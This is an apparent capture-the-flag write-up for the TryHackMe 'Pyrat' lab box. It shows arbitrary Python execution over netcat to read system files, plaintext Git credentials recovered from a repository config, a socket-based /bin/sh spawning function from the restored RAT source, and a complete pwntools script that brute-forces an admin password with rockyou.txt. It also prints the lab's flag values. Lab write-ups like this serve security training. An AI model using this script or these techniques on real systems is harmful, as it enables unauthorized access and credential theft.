Writeups
THM Pyrat
Reconnaissance:
NMAP 2 ports: SSH 22 && HTTP8000 HTTP doesnt respond well to browser Netcat connection runs pythons scripts ## traversing:
print(os.listdir('/'))
print(open('/<file>', 'r').read())
email @ /var/mail/
think = jose Dbile Admen = root ___
GITHUB
Found /opt/dev/.git and file with
../logs/HEAD
0000000000000000000000000000000000000000 0a3c36d66369fd4b07ddca72e5379461a63470bf Jose Mario <josemlwdf@github.com> 1687339934 +0000 commit (initial): Added shell endpoint
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[user]
name = Jose Mario
email = josemlwdf@github.com
[credential]
helper = cache --timeout=3600
[credential "https://github.com"]
username = think
password = _TH1NKINGPirate$_
SSH with creds
Open the user flag
996bdb1f619a68361417cabca5454705 #### git was mentionned so we could restore pyrat.py.old #### RAT was mentionned in THM infos git status #### git restore pyrat.py.old
def switch_case(client_socket, data):
if data == 'some_endpoint':
get_this_enpoint(client_socket)
else:
# Check socket is admin and downgrade if is not aprooved
uid = os.getuid()
if (uid == 0):
change_uid()
if data == 'shell':
shell(client_socket)
else:
exec_python(client_socket, data)
def shell(client_socket):
try:
import pty
os.dup2(client_socket.fileno(), 0)
os.dup2(client_socket.fileno(), 1)
os.dup2(client_socket.fileno(), 2)
pty.spawn("/bin/sh")
except Exception as e:
send_data(client_socket, e
We can connect to and end point here and if we call shell we get to /bin/sh
We start nc on pyrat.thm 8000
Typing shell then id returns www-data we aren’t root. Typing admin returns a password prompt. #### We use this python script from pwn import *
Set the host and port
host = “pyrat.thm” port = 8000
File path for rockyou.txt password list
password_file = “/usr/share/wordlists/rockyou.txt”
Connect to the target
def connect_to_service(): return remote(host, port)
Function to attempt login with a password
def attempt_password(password):
# Connect to the service
conn = connect_to_service()
# Send 'admin' as the username
conn.sendline(b"admin")
# Wait for the password prompt
conn.recvuntil(b"Password:")
# Send the password from the list
conn.sendline(password.encode())
# Receive the response and check if we're prompted for a password again
response = conn.recvline(timeout=2)
response = conn.recvline(timeout=2)
# Check if we're asked for the password again (indicates incorrect password)
if b"Password:" in response:
print(f"Password '{password}' failed.")
conn.close()
return False
elif b"Welcome" in response or b"Success" in response: # Adjust this based on the actual success message
print(f"Password '{password}' might be correct!")
conn.close()
return True
else:
# Some other response that might indicate progress (adjust based on your observations)
print(f"Unexpected response for password '{password}'. Response: {response}")
conn.close()
return False
# Main function to loop through password list
def fuzz_passwords():
with open(password_file, "r", encoding="latin-1") as f:
for password in f:
password = password.strip()
if attempt_password(password):
print(f"Found working password: {password}")
break
if __name__ == "__main__":
fuzz_passwords()
Run the script and it tosses out our password
abc123
back to nc pyrat.thm 8000
admin
abc123
cat root.txt
root flag
ba5ed03e9e74bb98054438480165e221
Notes:
First we take control of the python endpoint by simply inserting and running arbitrary python commands. We find credentials and then return to a previous version thanks to git’s version control. We then run our crafted python script to extract our root password.